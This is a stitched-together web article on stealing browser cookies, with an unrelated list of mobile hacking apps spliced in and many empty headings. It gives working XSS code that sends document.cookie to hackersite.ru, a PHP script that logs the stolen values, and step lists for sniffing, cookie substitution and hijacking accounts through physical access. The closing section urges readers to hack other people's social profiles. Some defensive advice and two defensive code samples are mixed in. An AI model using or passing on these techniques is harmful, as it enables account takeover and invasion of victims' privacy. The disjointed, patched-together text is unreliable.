How to intercept cookie files. Methods of stealing cookie files. Physical access to data
Have you ever wondered how some Web sites personalize their pages for visitors? This may show up, for example, in remembering the contents of a shopping "cart" (if the site sells goods) or in the way the fields of a form are filled in. HTTP, the protocol underlying the World Wide Web, has no means of tracking events from one visit to a site to the next, so a special extension was developed to make it possible to store such "state". This mechanism, described in RFC 2109, inserts special cookie data into HTTP requests and responses, which allows Web sites to track their visitors.
Cookie data can be kept for the duration of a communication session (per session), remaining in RAM during one session and being removed when the browser is closed, or even after a specified period of time expires. In other cases they are permanent (persistent), remaining on the user's hard disk as a text file. They are usually stored in the Cookies directory (%windir%\Cookies in Win9x and %userprofile%\Cookies in NT/2000). It is not hard to guess that, having captured cookie files on the Internet, a hacker can impersonate the user of that computer or collect important information contained in those files. After reading the following sections, you will understand how easy this is to do.
Intercepting cookie files
The most direct way is to intercept cookies as they are transmitted over the network. The intercepted data can then be used to log in to the corresponding server. This can be done with any packet capture utility, but one of the best is Laurentiu Nicula's SpyNet/PeepNet. SpyNet includes two utilities that work together. CaptureNet captures the packets themselves and saves them to disk, and PeepNet opens that file and converts it to a readable format. The following example is a fragment of a communication session reconstructed by PeepNet, in which a cookie is used for authentication and access control to the pages viewed (the names have been changed to preserve anonymity).
GET http://www.victim.net/images/logo.gif HTTP/1.0
Accept: */*
Referrer: http://www.victim.net/
Host: www.victim.net
Cookie: jrunsessionid=96114024278141622; Cuid=Torpm!zxtfrlrlpwtvfiseblahblah
The example shows a cookie fragment placed in an HTTP request sent to the server. The most important field is cuid=, which sets the unique identifier used to authenticate the user on www.victim.net. Suppose the hacker then visits victim.net and receives his own identifier and cookie (it is assumed that the site does not keep cookie data in virtual memory but writes it to the hard disk). The hacker can then open his own cookie file and replace the cuid= identifier in it with the one taken from the intercepted packet. When he then logs in to the victim.net server, he will be treated as the user whose cookie was intercepted.
PeepNet's ability to replay an entire session or a fragment of it makes attacks of this type much easier. With the Go Get It! button you can re-fetch the pages the user viewed, using the cookie data captured by CaptureNet. In the PeepNet dialog box you can see information about someone's completed orders; the cookie data captured by CaptureNet is used for authentication. Note the frame in the lower right corner of the dialog box with the session data, and the line that follows the Cookie line. These are the cookies used for authentication.
This is a rather clever trick. In addition, CaptureNet can provide a full record of traffic in decrypted form, which is almost equivalent to the capabilities of professional-grade utilities such as Sniffer Pro from Network Associates, Inc. However, SpyNet is even better: it is available for free!
Countermeasures
Be wary of sites that use cookies for authentication and for storing important identification data. One tool that helps with protection is Kookaburra Software's Cookie Pal, which can be found at http://www.kburra.com/cpal.html. It can be configured to generate warning messages when a Web site attempts to use the cookie mechanism, so you can "look behind the scenes" and decide whether to allow these actions. Internet Explorer has built-in cookie controls. To enable them, open the Internet Options control panel, go to the Security tab, select the Internet Zone item, choose Custom Level, and set the switch to Prompt for both persistent and per-session cookies. In the Netscape browser, cookie handling is configured with Edit > Preferences > Advanced, by selecting Warn me before accepting a cookie or Disable cookies (Fig. 16.3). When accepting a cookie, check whether it has been written to disk and whether the Web site collects information about users.
When visiting a site where cookies are used for authentication, make sure that the name and password you initially submit are encrypted, at least with SSL. Then this information will at least not appear in PeepNet as plain text.
The authors would prefer to give up cookies entirely if many frequently visited Web sites did not require them. For example, Microsoft's widely used Hotmail service requires cookies for registration. Since this service involves several different servers in the authentication process, adding them to the Trusted Sites zone is not so simple (this process is described in the section "Reasonable use of security zones: a general solution to the problem of ActiveX elements"). In this case the notation *.hotmail.com will help. Cookies are far from a perfect solution to the incompleteness of the HTTP protocol, but the alternatives appear to be even worse (for example, appending an identifier to the URL, which can be stored on proxy servers). Until a better idea appears, the only option is to control cookies using the methods listed above.
Capturing cookies via a URL
Imagine something terrible: Internet Explorer users click on specially crafted hyperlinks and become potential victims, risking having their cookies intercepted. Bennett Haselton and Jamie McCarthy of Peacefire, a teen organization that advocates freedom of communication on the Internet, published a script that brings this idea to life. The script extracts cookies from a client computer if its user clicks a link contained on the page. As a result, the contents of the cookie file become available to Web site operators.
This capability can be used for malicious purposes by embedding IFRAME tags in the HTML code of a Web page, an HTML e-mail, or a newsgroup message. The following example, proposed by security consultant Richard M. Smith, demonstrates the use of IFRAME tags together with the utility developed by Peacefire.
You can craft a cunning e-mail that would "capture" cookie files from the user's hard disk and transmit them to the operators of peacefire.org. To do this, a link to that site must be included many times, as shown in the example. Although the guys from Peacefire seem like pleasant people, hardly anyone would like confidential data to fall into their hands.
Countermeasures
Install the update that you can find at http://www.microsoft.com/technet/security/bulletin/ms00-033.asp. You can also use Cookie Pal or the built-in Internet Explorer features, as described above.
"A smartphone with hacker utilities? No such thing," we would have told you not long ago. The usual tools for carrying out attacks could be run only on something like Maemo. Now many familiar tools have been ported to iOS and Android, and some hack tools were written specifically for the mobile environment. Can a smartphone replace a laptop in penetration tests? We decided to check.
Android
Android is a popular platform not only for ordinary mortals but also for the right people. The number of useful hacker utilities here is simply off the charts. For this we can thank the system's Unix roots, which greatly simplified porting many tools to Android. Alas, Google does not allow some of them into the Play Store, so you have to install the corresponding APK manually. Also, some utilities need maximum access to the system (for example, the iptables firewall), so you should take care of root access in advance. Each manufacturer uses its own technique here, but the necessary instructions are easy to find. A good set of HOWTOs has been collected by Lifehacker (bit.ly/ewgdlu). If a particular model is not covered there, XDA-Developers (www.xda-developers.com) always comes to the rescue, with information on virtually any Android phone model. One way or another, some of the utilities described will work without root access.
Package Manager
BotBrew
Let's start the review with an unusual package manager. The developers call it "utilities for superusers", and that is not far from the truth. After installing BotBrew, you get a repository from which you can download a huge number of tools compiled for Android. Among them: Python and Ruby interpreters for running the numerous tools written in those languages, the tcpdump sniffer and the Nmap scanner for network analysis, Git and Subversion for working with version control systems, and much more.
Network scanners
PIPS
Traffic manipulation
Shark for Root
Traffic tunneling
Total Commander
Wireless networks
WiFi Analyzer
The built-in wireless network manager is not very informative. If you need to quickly get a full picture of the access points nearby, the WiFi Analyzer utility is a great choice. It not only shows all nearby access points but also displays the channel they operate on, their MAC address and, most importantly, the type of encryption used (on seeing the cherished letters "WEP", we can assume that access to the protected network is provided). In addition, the utility is ideal if you need to find where the desired access point is physically located, thanks to its visual signal-level indicator.
WiFiKill
This utility, as its developer declares, can be useful when a wireless network is clogged with clients who use up the entire channel at exactly the moment you need a good, stable connection. WiFiKill allows you to disconnect clients from the Internet either selectively or by a specific criterion (for example, it can single out all Apple devices). The program simply performs an ARP spoofing attack and redirects all clients to itself. The algorithm is implemented in a trivially simple way on top of iptables. A sort of control panel for fast-food wireless networks :).
Web Application Audit
HTTP Query Builder
Miscellaneous utilities
Encode
Remote access
ConnectBot
Once you have access to a remote host, you need to be able to use it, and for that you need clients. Let's start with SSH, where ConnectBot is already the de facto standard. In addition to a user-friendly interface, it provides the ability to set up protected tunnels over SSH connections.
PocketCloud Remote RDP / VNC
iOS
The iOS platform is no less popular among developers of security utilities. But while on Android root rights were needed only for some applications, on Apple devices a jailbreak is almost always required. Fortunately, even for the latest iDevice firmware (5.1.1) there is already a jailbreak tool. Along with full access you also get the alternative application manager Cydia, which already contains many utilities.
Work with the system
MobileTerminal
Data interception
Pirni & Pirni Pro
Analysis of wireless networks
WiFi Analyzer
Network scanners
Scany
What program does any pentester use anywhere on the planet, regardless of goals and tasks? A network scanner. In the case of iOS, it is most likely to be the very powerful Scany toolkit. Thanks to its set of built-in utilities, you can quickly get a detailed picture of network devices and, for example, open ports. In addition, the package includes network test utilities such as ping, traceroute and nslookup.
Fing
However, many prefer Fing. The scanner has fairly simple and limited functionality, but it is quite enough for a first acquaintance with the network of, say, a cafeteria :). The results show information about available services on remote machines, and the MAC addresses and host names of devices connected to the scanned network.
Nikto
It would seem everyone has forgotten about Nikto, but why? After all, this web vulnerability scanner, written in a scripting language (namely Perl), can easily be installed through Cydia. This means you can easily run it on your jailbroken device from the terminal. Nikto will gladly provide you with additional information about the web resource under test. In addition, you can add your own signatures to its knowledge base by hand.
sqlmap
This powerful tool for automatic exploitation of SQL vulnerabilities is written in Python, so once the interpreter is installed it can be used without any problems directly from the mobile device.
Remote control
SNMP Scan
Password recovery
Hydra
Exploitation of vulnerabilities
Metasploit
Cookies - information in the form of a text file that a website saves on the user's computer. They contain authentication data (login/password, ID, phone number, mailbox address), user settings, and access status. They are stored in the browser profile.
Hacking cookies - the theft (or "hijacking") of a web resource visitor's session. Private information becomes available not only to the sender and the recipient but also to a third party: the person who intercepted it.
Tools and methods of hacking cookies
Computer thieves, like their colleagues in real life, have, in addition to skills and knowledge, their own tools: a kind of arsenal of lock picks and probes. Let's get acquainted with the most popular hacker tricks used to extract cookies from Internet users.
Sniffers
Special programs for tracking and analyzing network traffic. Their name comes from the English verb "sniff", because they literally "sniff out" the packets transmitted between nodes.
Intruders, however, use a sniffer to intercept session data, messages and other confidential information. Their targets are mainly unprotected networks, where cookies are sent in an open HTTP session, that is, practically unencrypted. (Public Wi-Fi is the most vulnerable in this regard.)
To insert a sniffer into the Internet channel between the user's node and the web server, the following methods are used:
- "listening" on network interfaces (hubs, switches);
- branching and copying traffic;
- connecting into a break in the network channel;
- analysis by means of special attacks that redirect the victim's traffic to the sniffer (MAC spoofing, IP spoofing).
The abbreviation XSS stands for Cross Site Scripting. It is used to attack websites in order to steal user data.
The principle of XSS is as follows:
- an attacker injects malicious code (a specially disguised script) into a web page of a site, a forum, or a message (for example, in social network correspondence);
- the victim visits the infected page and activates the planted code on their PC (by clicking, following a link, etc.);
- in turn, the activated code "extracts" the user's confidential data from the browser (in particular, cookies) and sends it to the attacker's web server.
To "switch on" the XSS mechanism, hackers use all sorts of vulnerabilities in web servers, online services and browsers.
All XSS vulnerabilities are divided into two types:
- Passive. The attack is triggered by a request to a specific script of a web page. Malicious code can be entered into various forms on a web page (for example, into the site's search box). The resources most susceptible to passive XSS are those that do not filter HTML tags out of incoming data;
- Active. These reside directly on the server and are executed in the victim's browser. They are actively used by fraudsters in all sorts of blogs, chat rooms and news feeds.
Hackers carefully "camouflage" their XSS scripts so that the victim does not suspect anything. They change file extensions, pass the code off as a picture, give reasons to follow the link, and attract attention with interesting content. As a result, the PC user who could not control their own curiosity sends, with their own hand (a click of the mouse), the session cookies (with a login and password!) to the author of the XSS script, the computer villain.
Cookie substitution
All cookies are saved and sent back to the web server (from which they "came") without any changes, in their original form, with the same values, strings and other data. Deliberate modification of their parameters is called cookie substitution. In other words, by changing cookies an attacker passes off what he wants as valid. For example, when making a payment in an online store, the payment amount in the cookie is changed to a smaller one, and this is how "savings" on purchases arise.
Stolen session cookies from someone else's social network account are "inserted" into another session on another PC. The holder of the stolen cookies gets full access to the victim's account (correspondence, content, page settings) for as long as the victim remains on their page.
Cookies are edited using:
- the "Cookies..." function in the Opera browser;
- the Cookies Manager and Advanced Cookie Manager add-ons for Firefox;
- the IECookiesView utility (Internet Explorer only);
- a text editor such as AkelPad, NotePad or Windows Notepad.
Physical access to data
A very simple scheme consisting of several steps. It is effective only if the victim's computer, with an open session (on VKontakte, for example), was left unattended (and for long enough!):
- A JavaScript function that displays all saved cookies is entered into the browser's address bar.
- After "Enter" is pressed, they all appear on the page.
- The cookies are copied, saved to a file, and then transferred to a USB flash drive.
- On another PC, the cookies are substituted in a new session.
- Access to the victim's account is obtained.
As a rule, hackers use the above tools (and others) both in combination (since the level of protection on many web resources is quite high) and individually (when users are excessively naive).
XSS + sniffer
- An XSS script is created that specifies the address of an online sniffer (home-made or a specific service).
- The malicious code is saved with the extension .img (an image format).
- This file is then uploaded to a site page, a chat, or a private message, wherever the attack will be carried out.
- The user's attention is drawn to the "trap" that has been set (this is where social engineering comes into play).
- If the "trap" works, the cookies from the victim's browser are intercepted by the sniffer.
- The hacker opens the sniffer logs and extracts the stolen cookies.
- He then performs the substitution with the tools above to obtain the rights of the account owner.
Protecting cookies from hacking
- Use an encrypted connection (with the appropriate protocols and security methods).
- Do not respond to dubious links, pictures, or tempting offers to try "new free software", especially from strangers.
- Use only trusted web resources.
- End an authorized session by pressing the "Exit" button (not just by closing the tab!), especially if you logged in to the account not from a personal computer but, for example, from a PC in an Internet cafe.
- Do not use the browser's "Save Password" feature. Saved credentials increase the risk of theft many times over. Do not be lazy, and do not begrudge the few minutes it takes to enter the login and password at the start of each session.
- After web surfing (visits to social networks, forums, chat rooms, sites), delete saved cookies and clear the browser cache.
- Regularly update browsers and antivirus software.
- Use browser extensions that protect against XSS attacks (for example, NoScript for FF and Google Chrome).
- Periodically in accounts.
And most importantly - do not lose vigilance and attention during rest or work on the Internet!
What is a cookie?
There is a mechanism that allows an HTTP server to save some text information on the user's computer and then read it back. This information is called a cookie. In essence, each cookie is a pair: the name of a parameter and its value. Each cookie is also assigned the domain to which it belongs. For security reasons, in all browsers an HTTP server is allowed to access only the cookies of its own domain. In addition, a cookie may have an expiration date; it will then be stored on the computer until that date, even if you close all browser windows.
Why are cookies important?
In all multi-user systems, cookies are used to identify the user. More precisely, they identify the user's current connection with the service, the user session. If someone learns your cookies, they will be able to log in on your behalf, because at the moment very few Internet resources check for a change of IP address within one user session.
How to change or replace a cookie?
Browser developers do not provide built-in cookie editing tools. But you can get by with the ordinary Notepad.
Step 1: Create a text file containing
Windows Registry Editor Version 5.00
@="C:\\IE_EXT.HTM"
Save it under the name IE_EXT.REG
Step 2: Using the file you created, add the changes to the Windows registry.
Step 3: Create a text file containing
<script language="javascript">
// Copy the current page's cookies to the clipboard
external.menuArguments.clipboardData.setData("Text", external.menuArguments.document.cookie);
// Set (or overwrite) a cookie on the current page
external.menuArguments.document.cookie = "testname=testvalue; path=/; domain=testdomain.ru";
// Show the cookies after the change
alert(external.menuArguments.document.cookie);
</script>
Save it under the name C:\IE_EXT.HTM
Step 4: Go to the website of interest.
Step 5: Right-click on a free area of the page and select the menu item "Working with cookies". Allow access to the clipboard. The clipboard will now contain your cookies for this site. You can paste them into Notepad and take a look.
Step 6: To change a cookie, edit the file C:\IE_EXT.HTM, replacing testname with the name of the cookie, testvalue with its value, and testdomain.ru with the domain of the site. If necessary, add more similar lines. For convenience of control, I added to the script output of the current cookie before and after the change: alert(external.menuArguments.document.cookie);
Step 7: Perform step 5 again, and then refresh the page.
Outcome: we will enter this Internet resource with updated cookies.
How to steal cookies with JavaScript?
If an attacker manages to find a way to execute an arbitrary JavaScript script on the victim's computer, then reading the current cookies is very easy. Example:
var str = document.cookie;
But can he transfer them to his own site, given that, as I pointed out earlier, a JavaScript script cannot contact a site in another domain without additional confirmation? It turns out that a JavaScript script can load any picture from any HTTP server and, in doing so, pass any text information in the request for that picture. Example: http://hackersite.ru/xss.jpg?text_info. Therefore, if this code is executed:
var img = new Image();
img.src = "http://hackersite.ru/xss.jpg?" + encodeURI(document.cookie);
then the cookies will end up in the request for the "picture" and "leave" for the attacker.
How to process such requests to download "pictures"?
An attacker only needs to find hosting with PHP support and place code similar to this there:
<?php
$uid = urldecode($_SERVER["QUERY_STRING"]);
$fp = fopen("log.txt", "a");
fputs($fp, "$uid\n");
fclose($fp);
?>
Then all the request parameters sent to this script will be stored in the file log.txt. All that remains is to replace http://hackersite.ru/xss.jpg in the JavaScript script described earlier with the path to this PHP script.
Outcome
I showed only the easiest way to use XSS vulnerabilities. But it proves that the presence of even one such vulnerability on a multi-user website can allow an attacker to use its resources on your behalf.
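A server-side check for the two weaknesses the techniques above depend on, as an added example (not code from the original article): it parses `Set-Cookie` response headers and reports which session cookies would cross the network unencrypted (no `Secure`), be readable through `document.cookie` (no `HttpOnly`), or be written to disk (persistent). The sample headers are constructed, reusing the cookie names from the captured request earlier on the page; `SESSION_NAME_RE` and the finding codes are assumptions made for the example.

```javascript
// Heuristic (assumption of this example): cookie names that usually carry a
// session or authentication token, such as jrunsessionid or cuid.
const SESSION_NAME_RE = /(sess|sid|auth|token|uid)/i;

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute names are case-insensitive, so they are lower-cased here.
function parseSetCookie(header) {
  const parts = String(header).split(";").map((p) => p.trim()).filter(Boolean);
  if (parts.length === 0 || !parts[0].includes("=")) return null;
  const eq = parts[0].indexOf("=");
  const cookie = {
    name: parts[0].slice(0, eq).trim(),
    value: parts[0].slice(eq + 1).trim(),
    attrs: new Map(),
  };
  for (const part of parts.slice(1)) {
    const i = part.indexOf("=");
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    cookie.attrs.set(key, i === -1 ? true : part.slice(i + 1).trim());
  }
  return cookie;
}

// What each finding code means in terms of the techniques on this page.
const EXPLANATION = {
  NO_SECURE: "sent over plain HTTP, so a sniffer on the path can read it",
  NO_HTTPONLY: "readable by any script on the page via document.cookie",
  PERSISTENT: "written to disk, so it outlives the browser session",
};

// Return the finding codes for one parsed cookie (session cookies only).
function auditCookie(cookie) {
  if (!SESSION_NAME_RE.test(cookie.name)) return [];
  const codes = [];
  if (!cookie.attrs.has("secure")) codes.push("NO_SECURE");
  if (!cookie.attrs.has("httponly")) codes.push("NO_HTTPONLY");
  if (cookie.attrs.has("expires") || cookie.attrs.has("max-age")) {
    codes.push("PERSISTENT");
  }
  return codes;
}

// Audit a list of Set-Cookie header values; returns Map(name -> codes).
function auditHeaders(headers) {
  const report = new Map();
  for (const header of headers) {
    const cookie = parseSetCookie(header);
    if (cookie) report.set(cookie.name, auditCookie(cookie));
  }
  return report;
}

// What a script running on the page would get from document.cookie:
// every cookie except those marked HttpOnly. (Simplification: path, domain
// and scheme matching are ignored; all cookies are assumed to be in scope.)
function scriptVisibleCookies(headers) {
  return headers
    .map((h) => parseSetCookie(h))
    .filter((c) => c && !c.attrs.has("httponly"))
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// Constructed sample headers (not captured from a real site).
const SAMPLE_HEADERS = [
  "jrunsessionid=96114024278141622; Path=/",
  "cuid=CONSTRUCTED-VALUE; Path=/; Expires=Wed, 01 Jan 2031 00:00:00 GMT",
  "session_id=CONSTRUCTED-TOKEN; Path=/; Secure; HttpOnly",
  "theme=dark; Path=/; Max-Age=31536000",
];

for (const [name, codes] of auditHeaders(SAMPLE_HEADERS)) {
  console.log(name, codes.length ? codes.map((c) => `${c}: ${EXPLANATION[c]}`) : "ok");
}
console.log("document.cookie would expose:", scriptVisibleCookies(SAMPLE_HEADERS));
```

Only `session_id` passes: with `Secure` and `HttpOnly` set it is neither sent over plain HTTP nor present in what a script on the page can read.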
Methods of stealing cookie files
Cookie theft is a hacking method that works perfectly and is used by many hackers. If you also want to try it but do not know what to do, read our recommendations.
What are cookies?
This is information about a user's visits to a particular site. It is stored in a separate text document. You can find all kinds of information there, including logins, passwords, mailbox addresses and phone numbers. That is why hackers seek to get hold of these documents. To steal the necessary material, hackers resort to different methods.
Methods of stealing cookies
XSS vulnerability
It can be found and used on any site. When a specialist finds a vulnerability, he injects special code into it. The code differs depending on the purpose and is written for a specific resource. When the user comes to this page and refreshes it, all the changes are applied. The code starts to act: it is embedded in the victim's computer and collects all the necessary information from the browser.
To inject the code, any type of vulnerability can be used: an error in the web resource, in the browser, or in the computer system.
There are 2 types of XSS attacks:
Passive - aimed at a page script. In this case you need to look for vulnerable spots in page elements, for example a tab with dialogs, a search box, a video catalog, etc.
Active - these should be looked for on the server. They are especially common on various forums, blogs and chat rooms.
How to make a person apply XSS?
The task is not easy, because to activate the code the user often has to click on the link that contains it. You can disguise the link and send it in a letter along with an interesting offer, for example a big discount in an online store. You can also embed it all in a picture. The user is likely to look at it and will not suspect anything.
Installing a sniffer
This is the introduction of specialized programs for tracking traffic on someone else's device. A sniffer allows you to intercept transmitted sessions containing other people's data. In this way you can get all the logins and passwords, addresses, and any important information transmitted by the user. Attacks are most often carried out on unprotected HTTP data. Unprotected Wi-Fi is well suited for this.
A sniffer can be introduced in several ways:
- Copying traffic;
- Data analysis using attacks on traffic;
- Listening on interfaces;
- Inserting a sniffer into a break in the channel.
All data is stored on the web server in its original form. If you change it, that is considered substitution. All the material obtained can be used on another computer. In this way you get full access to the user's personal data. You can modify cookies using browser settings, add-ons or special programs. Editing is also possible in any standard text editor on a PC.
Cookies with virus
Specialists advise against using cookies unless there is a special need for them. If it is possible to turn them off, it is better to do so, because cookies are very vulnerable. Attackers often steal them. From these files one can obtain a huge amount of personal confidential information that will be used against a person. The most dangerous kind of files are those that remain in the system after the session has ended.
Cookies are often stolen with the help of a viral utility. This is done quite simply. A virus that collects certain material on the computer is embedded in some harmless utility. The viral program communicates with its owner's server. The program must be configured so that the browser uses it as a proxy server.
When the program lands on the victim's PC, it automatically starts collecting all stored data and sends it to you.
Viruses vary, and their capabilities may differ too. Some allow you to fully control the browser and view any information. Others are able to steal protected material. Still others collect only unprotected data.
You may have difficulty getting the viral program onto someone else's computer. You have to make the user download and run it. Here you can either send him a letter with a link to the program, or pass the program off as safe and wait until the person downloads it from your site himself.
How to protect cookie files from theft?
Most web resources are not sufficiently protected. Hackers easily find vulnerabilities and errors on these platforms.
Cookie protection rules:
- Bind the computer ID to the current session. Then, when the site is entered from another device, a new session will be started and the data from the previous one will not work.
- Tie the session to the browser. The same principle works as in the previous item.
- Encrypt the parameters transmitted over the network. Then the information saved in the document cannot be understood, and it will be useless to whoever intercepted it. This technique will not protect you 100%; some experts know how to decipher any material.
- Create a separate folder for the individuals.
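The first two rules above, together with a defence against the cookie substitution described earlier on the page, as an added example (not code from the original article): the server signs each cookie value with an HMAC that also covers the browser's `User-Agent`, so an edited value or a cookie replayed from another browser fails verification. It uses signing rather than the encryption named in the third rule; `SERVER_KEY`, the `payload.expires.tag` cookie layout and the choice of `User-Agent` as the browser binding are assumptions made for the example.

```javascript
const nodeCrypto = require("node:crypto");

// Assumption: a real deployment loads this key from a secret store.
const SERVER_KEY = nodeCrypto.randomBytes(32);

// HMAC over value, browser binding and expiry. JSON.stringify of an array
// gives an unambiguous encoding, so fields cannot be shifted into each other.
function tagFor(key, value, userAgent, expires) {
  return nodeCrypto
    .createHmac("sha256", key)
    .update(JSON.stringify([value, userAgent, expires]))
    .digest("base64url");
}

// Issue a cookie string of the form payload.expires.tag
function issueCookie(value, userAgent, ttlSeconds, now = Date.now(), key = SERVER_KEY) {
  const expires = Math.floor(now / 1000) + ttlSeconds;
  const payload = Buffer.from(value, "utf8").toString("base64url");
  return `${payload}.${expires}.${tagFor(key, value, userAgent, expires)}`;
}

// Verify a cookie presented by a browser that sent `userAgent`.
function verifyCookie(cookie, userAgent, now = Date.now(), key = SERVER_KEY) {
  const parts = String(cookie).split(".");
  if (parts.length !== 3 || !/^\d+$/.test(parts[1])) {
    return { ok: false, reason: "malformed" };
  }
  const [payload, expiresText, tag] = parts;
  const expires = Number(expiresText);
  const value = Buffer.from(payload, "base64url").toString("utf8");
  const expected = Buffer.from(tagFor(key, value, userAgent, expires));
  const given = Buffer.from(tag);
  // timingSafeEqual throws on unequal lengths, so compare lengths first.
  if (given.length !== expected.length || !nodeCrypto.timingSafeEqual(given, expected)) {
    return { ok: false, reason: "bad-signature" };
  }
  if (Math.floor(now / 1000) >= expires) return { ok: false, reason: "expired" };
  return { ok: true, value };
}

// Constructed scenario: one genuine cookie, then the three failure cases.
function demo() {
  const browserA = "Mozilla/5.0 (constructed sample browser A)";
  const browserB = "Mozilla/5.0 (constructed sample browser B)";
  const t0 = Date.UTC(2024, 0, 1);
  const cookie = issueCookie("user=alice;cart_total=100", browserA, 900, t0);

  // Substitution as described on the page: the amount is lowered in the
  // stored cookie while the rest (including the old tag) is kept.
  const [, expires, tag] = cookie.split(".");
  const editedPayload = Buffer.from("user=alice;cart_total=1").toString("base64url");
  const edited = `${editedPayload}.${expires}.${tag}`;

  return {
    genuine: verifyCookie(cookie, browserA, t0 + 1000),
    edited: verifyCookie(edited, browserA, t0 + 1000),
    otherBrowser: verifyCookie(cookie, browserB, t0 + 1000),
    expired: verifyCookie(cookie, browserA, t0 + 901 * 1000),
  };
}

console.log(demo());
```

Whoever captures a cookie on the wire sees the `User-Agent` header too, so this binding stops only casual replay; it complements HTTPS and `HttpOnly` rather than replacing them.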
How to find out the password for someone else's account through cookies?
To get other people's authorization data, you must first get to the file in which it was saved.
For those who use Mozilla Firefox: go to the Tools tab in the main menu. Then, in the settings, find the "Protection" section; that is where to look for all the important information about social network accounts. All passwords are hidden, so click the "Display" button. There you can also set up protection with a special code, so that no one but you can get at this information.
In Opera, only user names are available for general viewing. But in the menu you can find the password manager and view everything stored on the computer. The full list is in the manager. To access the passwords, you need to install an additional extension.
In Google Chrome, all this material can be seen in the advanced settings. There is a tab with all stored cookies.
Unfortunately, the standard Internet Explorer browser does not have such functions. To find out information about the web platforms the PC owner visits, you need to download a special program. It can be found on the Internet for free and is completely safe, but it is better to download it from proven sources. Do not forget that any program must be checked with an antivirus. This is especially true of utilities that work with passwords.
This technique suits only those who have physical access to the victim's computer. You can also find out someone else's password if the person logged in to the platform through your PC and saved their data.
Programs for theft of cookie files
Many hacker forums have appeared on the Internet, where hackers communicate with each other. People go there hoping to get free help. It is there that you can find a huge number of different programs for hacking. We want to warn you that you should not trust these programs. Utilities for remotely stealing cookies from someone else's device are dummies or viral programs. If you download this software to your PC, you will most likely fall into a fraudster's trap. Crooks post these programs for free. In this way they distribute viral software and gain control over other people's PCs. In general, such programs are a scam, as you will understand from their interface and content. If you are going to use any software to obtain the files, let it be a sniffer. Of course, sniffers are not so easy to use, and finding a good sniffer on the Internet is not easy either. But such software is available from specialists who can sell it for money. Remember that there are many scammers, and everyone has their own tricks. Trust only proven hackers who have a good reputation, reviews, and their own website.
In conclusion, I would like to note that cookie theft is a really powerful method whose effectiveness is very high. If you want to hack someone's profile in a social network or messenger, be sure to consider this option. This method works best when you can use the victim's computer. It is much more difficult to obtain the material remotely, but you can use our advice and try to apply this method in practice.